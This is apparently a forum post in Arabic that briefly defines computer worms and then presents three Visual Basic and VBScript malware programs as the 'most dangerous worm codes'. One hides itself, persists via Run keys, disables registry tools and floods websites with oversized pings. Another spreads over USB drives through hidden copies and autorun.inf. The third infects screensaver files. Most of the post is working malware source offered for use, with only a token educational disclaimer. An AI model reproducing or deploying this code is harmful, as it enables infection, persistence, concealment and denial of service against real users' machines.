الهم صلي على محمد و ال محمد
والان سوف اقدم لكم اخطر اكواد الديدان
ولنقم بتعريف الدودة
الدودة قريبة من الفيروس في التصميم ولكن تعتبر جزءاً فرعياً من الفيروس.
الاختلاف الذي يفرق الفيروس عن الدودة بأن الدودة تنتشر بدون التدخل
البشري حيث تنتقل من جهاز إلى آخر بدون عمل أي إجراء.
الجزء الخبيث
في الدودة هو قدرتها على نسخ نفسها في جهازك بعدة أشكال وبذالك يتم
إرسالها بدلا من مرة وحدة سترسل آلافاً من النسخ للأجهزة الأخرى. مما يحدث
مشاكل كبيرة. وتستغل الدودة طرق الاتصال التي تقوم بها لإتمام هذه العملية
لذالك قد ترى في بعض الأحيان ظهور نافذة طلب الاتصال اتوماتيكيا بدون طلبك
أنت فانتبه فقد يكون لديك دودة.
وآثار الدودة عادة هي زيادة في
استخدام مصادر الجهاز فيحصل في الجهاز تعليق بسبب قله الرام المتوفر وأيضا
تسبب الدودة في توقف عمل الخوادم فعلا سبيل المثال يمكنك تخيل التالي. لو
كان عندك دودة فستقوم الدودة بنسخ نفسها ثم إرسال لكل شخص من هم لديك في
القائمة البريدية نسخة وإذا فتح احدهم هذه الرسالة ستنتقل إلى كل من لديه
هو في قائمته البريدية وهذا يولد انتشاراً واسعاً جداً.
وأفضل مثال على الدودة هي ما حصل العام الماضي دودة البلاستر التي كانت تدخل لجهازك لتسمح ببعض الأشخاص بالتحكم بجهازك عن بعد
.
الكود الاول
private Sub Form_Load()
' Omega Worm
On Error Resume Next ' continues when an error occurs
' hides the program
Me.Hide
App.TaskVisible = False
' copies itself to system32
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsSystem32" + App.EXEName + ".exe"
' hides itself by setting RASH but can still be viewed if the ShowSuperHiiden is set to 1
SetAttr "C:WindowsSystem32" + App.EXEName + ".exe", vbReadOnly + vbArchive + vbSystem + vbHidden
' Disables the Registry from user access but apps can still access it
Set x = CreateObject("wscript.shell")
regkey = "HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System"
x.regwrite regkey & "DisableRegistryTools", 1, "REG_DWORD"
' Set ShowSuperHidden to 0
regkey = "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorer Advanced"
x.regwrite regkey & "ShowSuperHidden", 0, "REG_DWORD"
' adds itself to the registry startup
regkey = "HKLMSoftwareMicrosoftWindowsCurrentVersionRun"
x.regwrite regkey & "Windows", "C:WindowsSystem32" + App.EXEName + ".exe"
' checks the time then selects a case to determine the action to take
Do ' starts a loop
Select Case Time
Case Time > "7:01:00 PM" And Time < "5:59:00 PM" ' if the time is
between 7:01 pm and 5:59 pm it will ping aol,yahoo,google,microsoft 60
times then end
For t = 1 To 60
Shell ("ping -l 65500
www.microsoft.com")
Shell ("ping -l 65500
www.aol.com")
Shell ("ping -l 65500
www.yahoo.com")
Shell ("ping -l 65500
www.google.com")
Sleep 5000
Next t
Case Time > "6:00:00 PM" And Time < "7:00:00 PM"
On Error GoTo chk ' on error it will go to the chk label
FileSystem.ChDir "c:Shared" ' it will attempt to cd to a directory
chk:
If VBA.Err.Number = 76 Then ' if error 76 then it means the directory dose not exist
Else ' it means it does
FileCopy App.Path + "" + App.EXEName + ".exe", "c:Shared" + App.EXEName + ".exe" ' copy itself to it
End If
On Error GoTo chk2 ' same steps as above
FileSystem.ChDir "c:windowsShared"
chk2:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "c:windowsShared" + App.EXEName + ".exe"
End If
On Error GoTo chk3
FileSystem.ChDir "C:My Shared Folder"
chk3:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:My Shared Folder" + App.EXEName + ".exe"
End If
On Error GoTo chk4
FileSystem.ChDir "C:WindowsMy Shared Folder"
chk4:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsMy Shared Folder" + App.EXEName + ".exe"
End If
On Error GoTo chk5
FileSystem.ChDir "C:Share"
chk5:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:Share" + App.EXEName + ".exe"
End If
On Error GoTo chk6
FileSystem.ChDir "C:WindowsShare"
chk6:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsShare" + App.EXEName + ".exe"
End If
On Error GoTo chk7
FileSystem.ChDir "C:My Downloads"
chk7:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:My Downloads" + App.EXEName + ".exe"
End If
On Error GoTo chk8
FileSystem.ChDir "C:WindowsMy Downloads"
chk8:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsMy Downloads" + App.EXEName + ".exe"
End If
End Select
Loop
End Sub
الكود الثاني:
'mark
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc, hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
set fs = createobject("scripting.FileSystemObject")
set mf = fs.getfile(Wscript.scriptFullname)
set rg = createobject("Wscript.Shell")
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\Hidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.scriptFullname
end if
if cc = "'marker" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.scriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\winboot","wscript.exe /E:vbs
"&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\Hidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"
الكود الثالث:
هذا الفيروس يحقن نفسه داخل حافظة الشاشه
'For Educational Purposes
'Do Not Compile Or Test In Any Way
'Coded By The Napster ]
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal
dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Dim WinF As String, Host As Long, HProc As Long, HExit As Long, HCode, VCode, VCheck
Dim ScrGroup, Tmp1, AllScrs, Scr
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
'--- Start Of ScrInfection Virus ---'
Private Sub Form_Load()
App.TaskVisible = False
If Dir("C:windows", vbDirectory) <> "" Then
WinF = "C:windows"
ElseIf Dir("C:winnt", vbDirectory) <> "" Then
WinF = "C:winnt"
Else
End
End If
If Dir(WinF & "system32Update.scr") = "" Then
FileCopy App.Path & "" & App.EXEName & ".exe", WinF & "Update.scr"
End If
GetHost
ScrFun
End
End Sub
Function GetHost()
Open App.Path & "" & App.EXEName & ".scr" For Binary Access Read As #1
HCode = Space(LOF(1) - 1234)
Get #1, , HCode
Close #1
Open App.Path & "scrhost.scr" For Binary Access Write As #2
Put #2, , HCode
Close #2
Host = Shell(App.Path & "scrhost.scr", vbNormalFocus)
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit
Do While HExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess HProc, HExit
Loop
Kill App.Path & "scrhost.scr"
End Function
Function ScrFun()
Open App.Path & "" & App.EXEName & ".scr" For Binary Access Read As #1
VCode = Space(1234)
Get #1, , VCode
Close #1
Tmp1 = ""
ScrGroup = Dir$(WinF & "*.scr")
While ScrGroup <> ""
Tmp1 = Tmp1 & ScrGroup & "/"
ScrGroup = Dir$
Wend
If Right(Tmp1, 1) = "/" Then Tmp1 = Mid(Tmp1, 1, Len(Tmp1) - 1)
AllScrs = Split(Tmp1, "/")
For Each Scr In AllScrs
Open WinF & "" & Scr For Binary Access Read As #2
VCheck = Space(1234)
HCode = Space(LOF(2) - 1234)
Get #2, , VCheck
Get #2, , HCode
Close #2
If VCheck = VCode Then GoTo goNext
Inject:
Open WinF & "" & Scr For Binary Access Write As #3
Put #3, , VCode
Put #3, , HCode
Close #3
Dim RegTool As Object
Set RegTool = CreateObject("Wscript.Shell")
RegTool.RegWrite "HKCUControl PanelDesktopSCRNSAVE.EXE", WinF & "" & Scr
Exit For
goNext:
Next Scr
End Function
'--- [EOF] ---'
هذه الاكواد تعمل في بيئة الفي بي اس وانتظروا مني شرحها عن قريب.....
مشآرڪآتے
موضوع: اخطر من الفيروس اخطر شيء فى مجال الكمبيوتر 
